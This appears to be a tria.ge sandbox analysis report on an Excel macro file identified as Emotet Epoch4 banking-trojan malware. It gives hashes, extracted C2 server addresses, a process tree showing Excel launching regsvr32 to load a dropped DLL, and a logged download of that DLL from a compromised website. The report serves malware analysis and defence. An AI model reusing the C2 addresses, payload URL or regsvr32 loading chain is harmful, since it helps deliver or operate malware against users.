Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

?i=1izkympco.xlsm

windows7_x64

10

?i=1izkympco.xlsm

windows10-2004_x64

10

Analysis

  • max time kernel
    147s
  • max time network
    161s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    12/05/2022, 16:28 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ?i=1izkympco.xlsm

  • Size

    50KB

  • MD5

    793c5a832ea9b3c4a225bc96b4449bc2

  • SHA1

    168afc78144b659b18b606a26c3e9a6343dd104a

  • SHA256

    894658b992050ab6d7ee061f083a48264ce56c1b4fbc5ac87c142765405a47f7

  • SHA512

    df041addb6c8113b2add5439f8ce258016233a47a13a3d540187872e4ac25fe3ac87b016bb391a703e0cb73189f1720c0e723b6df47ef971238312ed77a9b607

Score
10/10
emotetepoch4bankertrojan

Malware Config

Extracted

Family

emotet

Botnet

Epoch4

C2

68.183.94.239:80

104.131.11.205:443

138.197.109.175:8080

187.84.80.182:443

79.143.187.147:443

216.158.226.206:443

167.99.115.35:8080

212.24.98.99:8080

1.234.21.73:7080

206.189.28.199:8080

158.69.222.101:443

164.68.99.3:8080

188.44.20.25:443

185.157.82.211:8080

134.122.66.193:8080

196.218.30.83:443

72.15.201.15:8080

5.9.116.246:8080

176.104.106.96:8080

153.126.146.25:7080
eck1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuw
3
TyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TIIEJgLTuqzx+58sdg==
4
-----END PUBLIC KEY-----
ecs1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9Xoov
3
pqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSPBghxjZdDxY+Q==
4
-----END PUBLIC KEY-----

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\_i=1izkympco.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1668
    • C:\Windows\SysWow64\regsvr32.exe
      C:\Windows\SysWow64\regsvr32.exe -s ..\rulm.dll
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      PID:1804
      • C:\Windows\SysWOW64\regsvr32.exe
        C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akcdbwthdrbgozm\vdupunehiaz.gxz"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1568

Network

  • flag-us
    DNS
    harleyqueretaro.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    harleyqueretaro.com
    IN A
    Response
    harleyqueretaro.com
    IN A
    63.247.138.144
  • flag-us
    GET
    http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/
    EXCEL.EXE
    Remote address:
    63.247.138.144:80
    Request
    GET /renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: harleyqueretaro.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Thu, 12 May 2022 16:35:56 GMT
    Server: Apache
    X-Powered-By: PHP/5.6.40
    Set-Cookie: 627d376c429cb=1652373356; expires=Thu, 12-May-2022 16:36:56 GMT; Max-Age=60; path=/
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Last-Modified: Thu, 12 May 2022 16:35:56 GMT
    Expires: Thu, 12 May 2022 16:35:56 GMT
    Content-Disposition: attachment; filename="illkVUA0aCB42y28qRyvY91Mq6.dll"
    Content-Transfer-Encoding: binary
    Content-Length: 868352
    Connection: close
    Content-Type: application/x-msdownload
  • 63.247.138.144:80
    http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/
    http
    EXCEL.EXE
    18.8kB
     895.9kB
     388
    649

    HTTP Request

    GET http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/

    HTTP Response

    200
  • 68.183.94.239:80
    regsvr32.exe
    152 B
     120 B
     3
    3
  • 68.183.94.239:80
    regsvr32.exe
    152 B
     120 B
     3
    3
  • 104.131.11.205:443
    regsvr32.exe
    152 B
     3
  • 104.131.11.205:443
    regsvr32.exe
    152 B
     3
  • 138.197.109.175:8080
    regsvr32.exe
    152 B
     3
  • 138.197.109.175:8080
    regsvr32.exe
    152 B
     3
  • 187.84.80.182:443
    regsvr32.exe
    104 B
     2
  • 8.8.8.8:53
    harleyqueretaro.com
    dns
    EXCEL.EXE
    65 B
     81 B
     1
    1

    DNS Request

    harleyqueretaro.com

    DNS Response

    63.247.138.144

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\rulm.dll
    Filesize

    848KB

    MD5

    26bf9a27e1ae4680db6c0528579aa5d5

    SHA1

    1c606018e5dc1bd2189b88216ea82c59f72449e9

    SHA256

    7a2b948dfa606620068203247663247cb95c4a64fde2fa6e522a0a2828027352

    SHA512

    d91d47ac63a24fed894e460e4d03fe2f23636d0f1a561f267007e0d1910424f437a3c8a38100c6b81c2824c50a76cc3c777158023608643f83c29545fcf6b2fb

    Download Submit

  • \Users\Admin\rulm.dll
    Filesize

    848KB

    MD5

    26bf9a27e1ae4680db6c0528579aa5d5

    SHA1

    1c606018e5dc1bd2189b88216ea82c59f72449e9

    SHA256

    7a2b948dfa606620068203247663247cb95c4a64fde2fa6e522a0a2828027352

    SHA512

    d91d47ac63a24fed894e460e4d03fe2f23636d0f1a561f267007e0d1910424f437a3c8a38100c6b81c2824c50a76cc3c777158023608643f83c29545fcf6b2fb

    Download Submit

  • memory/1568-68-0x0000000000290000-0x00000000002B4000-memory.dmp

    Filesize

    144KB

    Download

  • memory/1668-54-0x000000002FBE1000-0x000000002FBE4000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1668-55-0x0000000071391000-0x0000000071393000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1668-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1668-57-0x00000000764C1000-0x00000000764C3000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1668-58-0x000000007237D000-0x0000000072388000-memory.dmp

    Filesize

    44KB

    Download

  • memory/1804-63-0x0000000000280000-0x00000000002A4000-memory.dmp

    Filesize

    144KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.